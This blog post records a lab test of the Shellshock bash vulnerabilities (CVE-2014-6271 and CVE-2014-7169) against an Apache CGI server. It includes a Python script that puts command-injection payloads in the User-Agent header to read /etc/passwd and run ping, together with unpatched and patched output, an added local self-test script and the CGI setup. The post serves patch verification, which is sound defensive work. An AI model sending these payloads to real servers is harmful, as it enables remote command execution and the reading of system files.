lost and found ( for me ? )

bash vulnerability (CVE-2014-6271 and CVE-2014-7169)

Here are the logs from when I checked whether this is fixed on my machine.

Test setup: client (Python script) --- Apache + CGI

[ unpatched versions  ]

# bash --version
bash --version
GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)

This script tries to execute cat /etc/passwd and a ping command on the server by placing them after a bash function definition in the User-Agent header.
# cat http_request.py
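#!/usr/bin/env python
# Sends two requests whose User-Agent header carries a bash function
# definition followed by extra commands, then prints each response body.

import requests

url = 'http://192.168.11.8/example2.cgi'

# Trailing commands: emit a CGI header, then cat /etc/passwd.
headers1 = {
    'User-Agent': '() { test;};echo "Content-type: text/plain"; echo; echo; /bin/cat /etc/passwd',
}

# Trailing commands: emit a CGI header, then ping 192.168.11.1 three times.
headers2 = {
    'User-Agent': '() { test;}; echo "Content-type: text/plain"; echo; echo; /bin/ping -c 3 192.168.11.1',
}

# The labels below match the "first request" / "done!" lines in the logs.
print("first request")
r = requests.get(url, headers=headers1)
print(r.text)
print("done!")

print("second request")
r = requests.get(url, headers=headers2)
print(r.text)
print("done!")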


# ./http_request.py
first request


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin


done!

second request


PING 192.168.11.1 (192.168.11.1) 56(84) bytes of data.
64 bytes from 192.168.11.1: icmp_seq=1 ttl=64 time=13.6 ms
64 bytes from 192.168.11.1: icmp_seq=2 ttl=64 time=1.59 ms
64 bytes from 192.168.11.1: icmp_seq=3 ttl=64 time=6.83 ms

--- 192.168.11.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 1.598/7.363/13.656/4.937 ms

done!


[ patched versions ]

# bash --version
bash --version
GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)


# ./http_request.py
first request


Hi

done!

second request


Hi

done!
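
Both logs above report the same bash --version string, so the version alone does not show whether the fix is in place. As an added example (not part of the original post), the script below checks a bash binary locally for both CVEs in the title, without going through Apache. The function names and the LEAK marker are made up for this example, and the probe strings are the widely published local self-tests for these CVEs, not something taken from this page.

```shell
#!/bin/sh
# Added example, not from the original post. Function names and the LEAK
# marker are made up here; the probes are the widely published self-tests.

# CVE-2014-6271: a vulnerable bash executes the text that follows the
# function body while importing the variable, so LEAK appears on stdout.
vulnerable_6271() {
    out=$(env 'probe=() { :;}; echo LEAK' "$1" -c ':' 2>/dev/null) || true
    [ "$out" = "LEAK" ]
}

# CVE-2014-7169: parser state left over from the broken definition makes a
# vulnerable bash run "date" and redirect its output into a file named
# "echo". The probe runs in a scratch directory that is removed afterwards.
vulnerable_7169() (
    dir=$(mktemp -d) || exit 2
    cd "$dir" || exit 2
    env 'X=() { (a)=>\' "$1" -c 'echo date' >/dev/null 2>&1 || true
    if [ -e echo ]; then rc=0; else rc=1; fi
    cd / && rm -rf "$dir"
    exit "$rc"
)

# Prints one status line; returns 0 only if both checks come back clean,
# 2 if the binary cannot be executed. Pass an absolute path to test a
# bash other than the first one on PATH.
shellshock_status() {
    bin=${1:-$(command -v bash || true)}
    if [ ! -x "$bin" ]; then
        echo "error: no executable bash at '$bin'"
        return 2
    fi
    if vulnerable_6271 "$bin"; then s1=VULNERABLE; else s1=patched; fi
    if vulnerable_7169 "$bin"; then s2=VULNERABLE; else s2=patched; fi
    echo "CVE-2014-6271=$s1 CVE-2014-7169=$s2"
    [ "$s1$s2" = "patchedpatched" ]
}

shellshock_status
```

The exit status makes the check usable from a patch-verification job: non-zero means at least one probe fired or the binary was missing.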


[ apache cgi configuration ]

# tail -1 /etc/lsb-release  
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"


/etc/apache2/sites-available/000-default.conf

   <Directory /var/www/html/>
      Options Indexes FollowSymLinks MultiViews ExecCGI
      AllowOverride None
      Order allow,deny
      allow from all
   </Directory>


/etc/apache2/mods-enabled/mime.conf
   AddHandler cgi-script .cgi .py .pl .rb


# a2enmod cgi

# /etc/init.d/apache2 restart

# cat /var/www/html/example2.cgi
#!/bin/bash
echo "Content-type: text/plain"
echo
echo
echo "Hi"

# chmod 705 /var/www/html/example2.cgi
